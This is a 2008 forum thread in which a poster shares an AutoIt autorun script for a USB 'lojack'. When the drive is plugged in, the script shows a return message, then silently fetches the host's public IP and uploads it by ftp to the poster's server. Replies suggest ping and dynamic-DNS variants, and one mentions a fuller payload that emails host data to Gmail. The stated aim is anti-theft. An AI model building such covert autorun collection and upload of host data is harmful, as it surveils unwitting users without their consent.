haxwithaxe Posted December 7, 2008 Share Posted December 7, 2008 Hey all, I just finished the initial test of my ftp based usb lojak (cause the c is superfluous and the the name is trademarked) system. Haven't check my ftp server yet but we'll see when I get home. I did the alpha in batch and used a complied autoit script for the last test. It uses wget (if anyone can think of a windows built-in get app I'd like to know about it) to grab the automated whatismyip.com page and windows built-in ftp to send it to my ftp server at home. If anyone can point out a webmail service that doesn't require ssl/tls to use the smtp please tell me because I couldn't find any, and part of the whole point of this app is that when joe shmoe user (not His/Her Holyness sysadmin) plugs in the drive it will still tell me where it is. So stunnel isn't going to cut it. the autoit script is based off of the Daily Cup of Tech Script with some slight modifications. #NoTrayIcon Dim $Message1 Dim $Message2 Dim $Message3 Dim $Message4 Dim $Message5 Dim $Message6 Dim $Title $Title = "Help! I'm Lost!" $Message1 = "I've been lost and my owner would love to get my data back." $Message2 = "Please return me to:" $Message3 = "hax , 1337 Haxor WarDrive, Tahkalb, MD 01337" $Message4 = "or email me at haxor@haxor.com to arrange a pick-up." $Message5 = "Your will receive a shiny new USB drive just as big as this one for your trouble." $Message6 = "Thanks for your honesty in advance. - hax" MsgBox(266304,$Title,$Message1 & @CRLF & $Message2 & @CRLF & $Message3 & @CRLF & $Message4 & @CRLF & $Message5 & @CRLF & $Message6 ) Run ( "explorer ..\..\..\..\..\..\..\..\..\" ) ;no drive change so it will display the toplevel dir on drive it is run from #NoTrayIcon DriveGetDrive ( "cdrom" ) ;get ipaddr and mail it if safe.dat does not exist on C:\ If FileExists ("C:\safe.dat") Then Exit Run ( "wget -P %temp%\ http://whatismyip.com/automation/n09230945.asp" ) Run ( "ftp -n -s:ip.dat example.com" ) ip.dat is as follows echo user ftpuser ftppasswd echo bin echo put %temp%\n09230945.asp echo quit Also I'm a giant noob when it comes to autoit scripting so please feel free to flame my scripting. woops left the wrong address in there Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted December 7, 2008 Share Posted December 7, 2008 I am actually going to use this for my server since it doenst have a static ip Quote Link to comment Share on other sites More sharing options...
Xarf Posted December 7, 2008 Share Posted December 7, 2008 Why not set up a web server on your home computer (not public) and just put in your code: ping <your IP> Then watch for ICMP in the server logs. Quote Link to comment Share on other sites More sharing options...
haxwithaxe Posted December 7, 2008 Author Share Posted December 7, 2008 Why not set up a web server on your home computer (not public) and just put in your code: ping <your IP> Then watch for ICMP in the server logs. Some ISPs have their networks setup so that the ping would appear to come from an ISP server and not the target box. Also if their using a ftp proxy when the drive is plugged-in I don't want to get the ftp proxy's ip. and if they're using a web proxy their ip will show up in my logs. If for some reason they're using both then I'm up a creek. This isn't meant to be a tool for hacking just something to help me get my thumb-drive back if it's lost or stolen. Also the above site was my personal site so don't use it please. I've changed it protect the inconsiderate from themselves. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 8, 2008 Share Posted December 8, 2008 another way to do this us to use a service like dyndns... which is basically a little program that logs into the dyndns server to bind a name to a dynamic ip address... this could easily be scripted to autorun on a usb drive... the only problem is that if someone has autorun turned off then it totally defeats the purpose because you cant force autorun to run if its disabled. Quote Link to comment Share on other sites More sharing options...
haxwithaxe Posted December 8, 2008 Author Share Posted December 8, 2008 the only problem is that if someone has autorun turned off then it totally defeats the purpose because you cant force autorun to run if its disabled. True. I plan to do a redundant execution. Both autorun from U3 and from all the menu options in the autoplay menu of the fat16 part of the drive. Infact the script above has only been tested with auto play so far. (finals week and I needed an excuse for myself to mess around instead of studying.) Now if they have autorun usbdevices turned off completely I have to rely on the DCoT part of the script to work it's social engineering magic and have the person return the drive to me. Quote Link to comment Share on other sites More sharing options...
haxwithaxe Posted December 8, 2008 Author Share Posted December 8, 2008 Hey all, I've decided to implement all your suggestions thus far. ddns updater ping ?mail? -- I need to play with that one a while. ?ftp? if mailing doesn't workout also I've been looking at windows built-in utillities (hence ftp instead of blat). perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authoities in case of theft. Again this isn't aimed at uber-hackers so I'm working under the assumtion that at least on of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 8, 2008 Share Posted December 8, 2008 Hey all, I've decided to implement all your suggestions thus far. ddns updater ping ?mail? -- I need to play with that one a while. ?ftp? if mailing doesn't workout also I've been looking at windows built-in utillities (hence ftp instead of blat). perhaps getmac, ipconfig will be in there next as well to give some more device specific evidence to the authoities in case of theft. Again this isn't aimed at uber-hackers so I'm working under the assumtion that at least on of the methods will work properly. So if the shmuk at school steals your drive you can turn over the logs to the police and the campus IT department can give them what they need. i have some autoIT code that will email to gmail using ssl without having ot use blat or stunnel... i actually have a full payload that dumps all the info over ssl to gmail via autoIT its posted in the usbhacks section. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.